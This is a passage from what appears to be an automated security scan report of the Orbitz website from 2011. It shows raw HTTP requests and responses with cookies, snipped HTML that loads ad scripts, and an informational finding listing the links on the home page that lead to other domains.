dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=61C189744166677C81470DC95ADF9329; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:07:04 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 184482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-vacationpackages.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Packages%20by%20Destination/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/lowestpackages.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/New!%20Top%20Hotel%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-hotels.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotel%20Property%20Offers/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/hotelpromos.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Top%20Flight%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-flights.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Flight%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/flightdeals.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
</tr>

   <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"></script> <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"></script> <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"></script>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Car%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cardeals.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Cruise%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cruises.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x200_dow">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=300x200_dow&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&" height="600" width="300" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&" height="600" width="300" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
</html>
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&" height="1" width="1" border="0"></a>
...[SNIP]...

17.340. http://www.orbitz.com/App/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Home

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/Home?reset=true

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://facebook.com/orbitz
http://outsideonline.com/
http://twitter.com/orbitz
http://www.away.com/
http://www.cheaptickets.com/
http://www.ebookers.com/
http://www.facebook.com/Orbitz
http://www.facebook.com/orbitz
http://www.google.com/jsapi
http://www.gorp.com/
http://www.hotelclub.com/
http://www.lodging.com/
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzforbusiness.com/homepage_asset
http://www.orbitzforbusiness.com/homepage_footer
http://www.orbitzgames.com/
http://www.ratestogo.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&
http://www.trip.com/
http://www.twitter.com/orbitz

Request

GET /App/Home?reset=true HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=86EC27D3D1986B94829078F29A1F9185; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Thu, 03 Feb 2011 06:44:33 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/
Content-Length: 175757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&" height="60" width="468" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&"></script>
...[SNIP]...
